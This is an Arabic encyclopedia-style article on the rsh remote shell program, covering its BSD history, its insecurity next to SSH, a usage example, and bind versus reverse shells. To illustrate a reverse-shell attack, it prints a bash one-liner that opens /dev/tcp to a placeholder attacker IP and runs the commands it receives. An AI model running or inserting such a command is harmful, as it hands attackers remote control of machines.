RemoteSH

الصدفة البعيدة ( rsh ) هي برنامج كمبيوتر يعمل عبر سطر الأوامر ويمكنه تنفيذ أوامر الصدفة كمستخدم آخر ، وعلى جهاز كمبيوتر آخر عبر شبكة الكمبيوتر .

يقوم النظام البعيد الذي يتصل به rsh بتشغيل برنامج rsh الخفي (rshd). ويستخدم هذا البرنامج عادةً منفذ بروتوكول التحكم بالنقل (TCP) المعروف برقم 514.

تاريخ

نشأت Rsh كجزء من نظام التشغيل BSD Unix ، جنبًا إلى جنب مع rcp ، كجزء من حزمة rlogin على 4.2BSD في عام 1983. ومنذ ذلك الحين تم نقل rsh إلى أنظمة تشغيل أخرى.

يحمل الأمر rshنفس اسم أداة UNIX شائعة أخرى، وهي الصدفة المقيدة ، والتي ظهرت لأول مرة في PWB/UNIX ؛ في System V Release 4 ، غالبًا ما توجد الصدفة المقيدة في /usr/bin/rsh.

كما هو الحال مع أوامر بيركلي الأخرى التي تتطلب مصادقة المستخدم، فإن بروتوكول rsh غير آمن للاستخدام عبر الشبكة، لأنه يرسل معلومات غير مشفرة عبر الشبكة، لأسباب أخرى. وتقوم بعض التطبيقات أيضًا بالمصادقة عن طريق إرسال كلمات مرور غير مشفرة عبر الشبكة. وقد تم استبدال rsh إلى حد كبير ببرنامج Secure Shell (SSH)، حتى على الشبكات المحلية. [ 1 ] [ 2 ]

مثال

كمثال على استخدام rsh، يقوم الأمر التالي بتنفيذ الأمر mkdir testdir كمستخدم remoteuser على الكمبيوتر host.example.com الذي يعمل بنظام يشبه نظام UNIX:

$ rsh -l Remoteuser host.example.com "mkdir testdir"

بعد انتهاء تنفيذ الأمر، يتوقف rsh. إذا لم يُحدد أي أمر، فسيسجل rsh الدخول إلى النظام البعيد باستخدام rlogin . يتم البحث عن موقع الشبكة الخاص بالكمبيوتر البعيد باستخدام نظام أسماء النطاقات (DNS) .

غلاف مقوى وغلاف معكوس

يمكن بدء جلسة طرفية عن بُعد إما من جهاز محلي (يرسل الأوامر) أو من جهاز بعيد (تُنفذ عليه الأوامر). [ 3 ] في الحالة الأولى، تُسمى الطرفية عن بُعد "طرفية الربط"، وفي الحالة الثانية "طرفية عكسية". [ 4 ]

يمكن استخدام تقنية الوصول العكسي (Reverse Shell) عندما يكون الجهاز المراد تنفيذ الأمر عليه غير قابل للوصول المباشر، كما هو الحال في الصيانة عن بُعد لأجهزة الكمبيوتر الموجودة خلف جدار الحماية (NAT) والتي لا يمكن الوصول إليها من الخارج. تقوم بعض الثغرات الأمنية بإنشاء اتصال عكسي من الجهاز المُستهدف إلى الأجهزة التي يتحكم بها المهاجمون (يُسمى هذا "هجوم الوصول العكسي"). يوضح الكود التالي مثالًا على هجوم الوصول العكسي: [ 5 ]

نفّذ الأمر التالي: ` exec 5 <>/dev/tcp/<attacker_IP>/80 ; cat < & 5 | while read line ; do \$ line 2 > & 5 > & 5 ; done`

يفتح هذا البرنامج منفذ TCP على المنفذ 80 الخاص بعنوان IP الخاص بالمهاجم كمعرّف ملف . ثم يقرأ أسطرًا من المنفذ بشكل متكرر وينفذها، مع إعادة توجيه كل من مخرجات stdout وstderr إلى المنفذ. بعبارة أخرى، يمنح هذا البرنامج المهاجم إمكانية الوصول عن بُعد إلى الجهاز.

انظر أيضاً

مراجع

  1. "SSH، بروتوكول Secure Shell: الدليل الشامل" . www.researchgate.net . مؤرشف من الأصل بتاريخ 11 نوفمبر 2023. تم الاطلاع عليه بتاريخ 11 نوفمبر 2023 .
  2. "بروتوكول Secure Shell - كل ما تحتاج لمعرفته" . dev.to. 28 نوفمبر 2022. تم الاطلاع عليه بتاريخ 11 نوفمبر 2023 .
  3. "بروتوكول SSH الآمن" . www.techtarget.com . مؤرشف من الأصل بتاريخ 11 نوفمبر 2023. تم الاطلاع عليه بتاريخ 11 نوفمبر 2023 .
  4. "الفرق بين الغلاف المقيد والغلاف العكسي" . www.geeksforgeeks.org . ١٤ ديسمبر ٢٠٢١. مؤرشف من الأصل بتاريخ ١١ نوفمبر ٢٠٢٣. تم الاطلاع عليه بتاريخ ١١ نوفمبر ٢٠٢٣ .
  5. "ما هو الصدفة العكسية؟" . Sysdig . مؤرشف من الأصل بتاريخ 28-11-2023 . تم الاسترجاع بتاريخ 28-11-2023 .